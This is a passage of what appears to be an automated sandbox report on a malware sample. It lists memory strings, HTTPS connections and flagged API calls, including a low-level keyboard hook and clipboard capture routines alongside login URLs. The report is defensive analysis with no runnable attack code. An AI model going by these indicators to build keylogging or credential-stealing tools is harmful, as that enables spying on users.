00000003.00000003.2171750805.00004C380160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2170113202.00004C3801518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2170063050.00004C38014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2245187884.00006B3C022E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2171876378.00004C3801620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2171388549.00004C38015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2171818615.00004C380161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2170824400.00004C380156C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                      Source: chrome.exe, 00000003.00000003.2171428313.00004C38015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2171388549.00004C38015D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
                      Source: chrome.exe, 00000003.00000003.2169433766.00004C3801454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Con
                      Source: chrome.exe, 00000003.00000003.2170824400.00004C380156C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2172018018.00004C3801634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                      Source: chrome.exe, 00000003.00000003.2170063050.00004C38014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
                      Source: chrome.exe, 00000003.00000003.2169433766.00004C3801454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                      Source: chrome.exe, 00000003.00000003.2173492934.00004C380171C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                      Source: chrome.exe, 00000003.00000003.2173573249.00004C3801720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2173492934.00004C380171C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/https://google-ohttp-relay-safebrowsing.fast
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.comb
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                      Source: chrome.exe, 00000003.00000003.2197208210.00006B3C00770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                      Source: chrome.exe, 00000003.00000003.2197208210.00006B3C00770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                      Source: chrome.exe, 00000003.00000003.2234448927.00006B3C01C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                      Source: chrome.exe, 00000003.00000003.2234448927.00006B3C01C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                      Source: chrome.exe, 00000003.00000003.2156788730.00004C3800F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardL8
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                      Source: chrome.exe, 00000003.00000003.2234448927.00006B3C01C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardk
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                      Source: chrome.exe, 00000003.00000003.2148395604.00004C38012F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/
                      Source: chrome.exe, 00000003.00000003.2148395604.00004C38012F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/OfflinePagesPrefetchingForcedOn_OfflinePagesPrefetchingOfflinePage
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/b
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2#
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                      Source: chrome.exe, 00000003.00000003.2197208210.00006B3C00770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000003.00000003.2197208210.00006B3C00770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=blockedb
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tunnel-staging.googlezip.net/2
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeString found in binary or memory: https://www.google.com
                      Source: chrome.exe, 00000003.00000003.2206162041.00006B3C00E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/2(
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/b
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromesuggestionsJ
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromesuggestionsJK
                      Source: chrome.exe, 00000003.00000003.2232021563.00006B3C01380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/coacbE
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                      Source: chrome.exe, 00000003.00000003.2238119064.00006B3C01EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chrome-content-suggestions
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chrome-content-suggestionsb
                      Source: chrome.exe, 00000003.00000003.2246469696.00006B3C02464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/change_password_scripts.jsonb3
                      Source: chrome.exe, 00000003.00000003.2241682249.00006B3C020CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241639370.00006B3C020C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241593897.00006B3C020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241516903.00006B3C020B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.json
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb3
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/change_password_scripts.jsonb3
                      Source: chrome.exe, 00000003.00000003.2241682249.00006B3C020CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241639370.00006B3C020C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241593897.00006B3C020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241516903.00006B3C020B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.json
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb3
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/change_password_scripts.jsonb3
                      Source: chrome.exe, 00000003.00000003.2241682249.00006B3C020CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241639370.00006B3C020C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241593897.00006B3C020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241516903.00006B3C020B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.json
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb3
                      Source: chrome.exe, 00000003.00000003.2241682249.00006B3C020CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241639370.00006B3C020C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241593897.00006B3C020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2241516903.00006B3C020B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.json
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb3
                      Source: chrome.exe, 00000003.00000003.2164263140.00004C3801118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/android/translate_ranker_
                      Source: chrome.exe, 00000003.00000003.2166481067.00004C3800320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.privacysandbox.comb
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49853 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50011 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50069 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50070 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50071 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50072 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50073 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000000_2_004099E4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0040987A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_004098E2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_00406DFC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00406E9F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_004068B5
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_004072B5
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
